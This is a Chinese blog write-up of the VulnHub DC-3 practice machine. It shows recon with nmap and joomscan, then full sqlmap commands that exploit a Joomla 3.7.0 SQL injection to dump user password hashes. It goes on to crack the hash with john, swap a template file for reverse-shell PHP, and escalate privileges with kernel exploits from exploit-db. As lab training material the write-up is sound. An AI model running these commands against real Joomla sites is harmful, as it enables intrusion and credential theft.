VulnHub 靶机学习No.4 DC-3

最新推荐文章于 2024-01-08 21:32:29 发布
最新推荐文章于 2024-01-08 21:32:29 发布
阅读量246 收藏
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gh0stf1re/article/details/108889605
版权

本篇博客的主要内容

VulnHub 靶机学习No.4 DC-3

靶机运行说明

  • 靶机难度:初级
  • 攻击机:kali linux,ip地址:192.168.56.102
  • 靶机:DC-3,IP地址:192.168.56.106
  • 目标:找到终极flag

信息收集

仅开启kali和DC-3靶机,使用nmap扫描kali所在C段,确认192.168.56.106为靶机的ip
在这里插入图片描述
进行全端口扫描,发现其仅开放80端口的http服务
在这里插入图片描述
使用whatweb 来进行web的信息收集,发现使用的joomla
在这里插入图片描述
对症下药,joomscan(kali自带)走你

joomscan --url http://192.168.56.106

发现joomla版本为3.7.0,4个可以列目录的链接,以及管理员登录页。
在这里插入图片描述
有了版本,就可以使用searchsploit 命令在exploit-db,查找是否有漏洞以及利用脚本,成功找到一个sql注入漏洞。
在这里插入图片描述
在这里插入图片描述
这文件是真的良心,把漏洞链接,sqlmap具体命令都给我们了。可以看到使用的是mysql数据库,存在的sql注入类型是布尔盲注、报错注入和基于时间的盲注。
在这里插入图片描述
(为了效率)由于知道数据库是mysql的,所以在文档推荐的sqlmap命令后面添加了 --dbms=mysql;由于sqlmap默认是从联合注入开始跑的(因为联合注入跑数据最快),而joomla没有联合注入,所以限定成布尔盲注和报错注入吧,添加–technique=BE,于是得到下面的命令:

sqlmap -u "192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --dbms=mysql --technique=BE

跑出了5个库
在这里插入图片描述
查看当前数据库:

sqlmap -u "192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering] --dbms=mysql --technique=BE

得知当前数据库为 joomladb
在这里插入图片描述
爆表

sqlmap -u "192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --tables -D "joomladb" -p list[fullordering] --dbms=mysql --technique=BE

一共跑出76个表 (admin账号在 #__users 表)
在这里插入图片描述
爆列

sqlmap -u "192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --columns -T "#__users" -D "joomladb" -p list[fullordering] --dbms=mysql --technique=BE

ps:这里爆列时需要枚举列,输入 y
在这里插入图片描述
在这里插入图片描述
当然看username 和 password 列

sqlmap -u "192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump -C "username,password" -T "#__users" -D "joomladb" -p list[fullordering] --dbms=mysql --technique=BE

成功拿到密码hash
在这里插入图片描述

然后我卡了很久,看了别人的wp,才知道使用 john 来爆破。由于已经爆破过,所以这时候无法爆破了,只能显示爆破结果:snoopy
在这里插入图片描述
使用 admin/snoopy 在后台登录页( /administrator )成功登录。
这时拿 shell 和 wordpress 后台常规拿shell类似
(虽然wordpress 还有更方便的 wp_admin_shell_upload)
在这里插入图片描述
这两个模板任选其一就行(我选择protostar)
在这里插入图片描述
把 error.php 的内容用反弹 shell 的php代码进行替换,然后点击上方的 Save&Close (当然,也可以新建一个php文件)
在这里插入图片描述
这个 error.php 的访问路径:
http://192.168.56.106/templates/protostar/error.php
kali 开启4444端口监听,然后访问上述链接,成功弹 shell
在这里插入图片描述

提权

这次的提权使用的是linux内核提权,一共尝试了10个左右的exp,只成功了一个,但是也学到了一些东西

通过 uname -a 得知内核版本为 4.4.0-21
通过 lsb_release -a 得知发性版本为 Ubuntu 16.04

利用内核版本搜索利用脚本
在这里插入图片描述
先揭晓答案,最后可以利用的是39722.txt。这个文档里面有具体的提权步骤,我这时就不实操了(白天尝试了10来个exp)。
坑:
如果你使用的搜索语句是

searchsploit linux 4.4.0

恭喜你,你将会成功的避开这个可以起到效果的exp(别问我怎么知道的),它前面的描述是 4.4.x
在这里插入图片描述
一个小建议:
eg:如果你想要尝试44298.c这个exp,怎么用呢?
在这里插入图片描述
有些情况,并不是使用这个文件就行,建议cat 下这个文件,看看注释(注释中可能会有具体的用法,也可能需要你去下载一个压缩包,里面有提权过程中需要的多个文件)。44298.c 对应的网页就是:https://www.exploit-db.com/exploits/44298

知识点总结

  • sqlmap 各个参数的使用(太久没用,忘了)
  • john的使用
  • joomla cms 后台getshell
  • linux 内核提权,还得继续学习 searchsploit 的使用(如何搜索得更准确,如何过滤,如何让title显示全?)

参考链接:

https://www.jianshu.com/p/76451380b129
https://www.cnblogs.com/This-is-Y/p/13308122.html

gh0stf1re
关注
专栏目录
VulnHub 靶机学习No.6 Bulldog
gh0stf1re的博客
10-03 316
本篇博客的主要内容VulnHub 靶机学习No.6 Bulldog靶机运行说明信息收集利用 bash 弹shell提权知识点总结参考链接: VulnHub 靶机学习No.6 Bulldog 靶机运行说明 靶机难度:初级至中级 攻击机:kali linux,ip地址:192.168.56.102 靶机DC-4,IP地址:192.168.56.101 目标:找到终极flag 信息收集 BullDog 靶机直接显示了IP地址:192.168.56.101 使用 nmap 对其进行全端口扫描 nmap -s
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5970
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
VulnHub DC3
baynk的博客
05-16 297
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-32,312/ 下载地址2 dc-3.2:https://pan.baidu.com/s/1LyKZbgQiQsSqpMlY8kNUBw 提取码: z4pv 下载地址3 dc-3:https://pan.baidu.com/s/1lt3ek4ra2jHbR4HVEyrk7g 提取码: j8cg 只有一个flag了,同时也只有一个切入点,而且官网上DC3好像升到了DC3-2,不知道到和以前的区别大不大,我这里就
Vulnhub DC-3
柠檬木有枝
07-14 1166
访问服务,发现是 joomla 服务,使用 joomlacan 扫描 joomlascan -u 192.168.6.129 3.7.0 版本,存在 SQl 注入漏洞(CVE-2017-8917) github 下载 exp 然后运行,获取到用户名密码 hash 使用 hashcat 破解 hash,破解密码得 snoopy 登录到后台 发现提示,需要获取到 root 权限 编辑模版,修改...
VulnHubDC-3
qq_45434762的博客
03-23 520
一个粗糙的信息收集通过扫描端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架我们打开网站看看在首页提示我们,这个靶机只有一个Flag,并且没有任何线索使用dirb扫...
vulnhub-DC3
weixin_55129870的博客
05-15 524
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4814
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 233
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1683
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
Vulnhub靶机 DC-3
菜浪马废的博客
03-20 410
扫描ip 找到靶机192.168.0.131 发现开放80端口 必须访问一下啊 这个样子的,没啥信息 上插件 wappalyzer 火狐的指纹信息插件 nmap也扫了一下 实锤了,Joomla的cms 那肯定要用配套的joomscan扫一下啊 没事就扫一扫,扫扫更健康 没安装,先装一下 apt-get install joomscan 安装命令 看见版本号了,3.7.0,还有后台...
[Vulnhub] DC-3
weixin_63231007的博客
01-28 570
DC系列靶机-第三弹(JoomlaCMS漏洞+sqlmap+系统漏洞提权)
vulnhubdc3
qq_54030686的博客
06-08 301
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
vulnhub DC系列 DC-3
m0_64815693的博客
12-29 1854
vulnhub DC系列 DC-3
vulnhub靶场之DC-3
最新发布
qq_58091216的博客
01-08 1368
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
vulnhub渗透测试靶机DC-3
weixin_46128614的博客
01-11 836
靶机下载:https://www.vulnhub.com/entry/dc-3,312/ nmap 扫描只有一个80端口 直接访问 没有过多提示 用dirb跑发现了后台登录页面 是一个joomld搭的开源站 没有验证码 尝试爆破管理员密码 bp发现是snoopy 进入后台 找到template页面 编辑一个php文件 提醒:此处用的是冰蝎shell。msf的shell无法连上,system(...
vulnhub靶机DC-3
travelnight的博客
03-10 4859
原知识星球老文搬运 拿到靶机之后导入到virtualBOX里面。 1. nmap扫描主机存活,192.168.56.104 有个80端口,不放心的话可以用masscan。 2. 直接访问看下,这里提示只有一个flag,直接拿到root权限。 3. 习惯性的上一下dirbuster。发现访问到不存在的URL时候服务器也是返回200OK,这个扫描就没有什么参考价值了。 4.御剑扫描一下,发现后台页面。这个是joomlaCMS 5.参考了下知乎的这个joomla渗透,https
vulnhub靶机dc-3
m0_52328368的博客
08-14 1337
dc-3靶机教程
vulnhub靶场,DC-3
kukudeshuo的博客
07-11 444
vulnhub靶场,DC-3 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/ 攻击机:kali(192.168.58.130) 靶机DC-3(192.168.58.146) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.146 使用nmap扫描查看目标靶机端口开放情况 可以看到目标靶机只开放
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值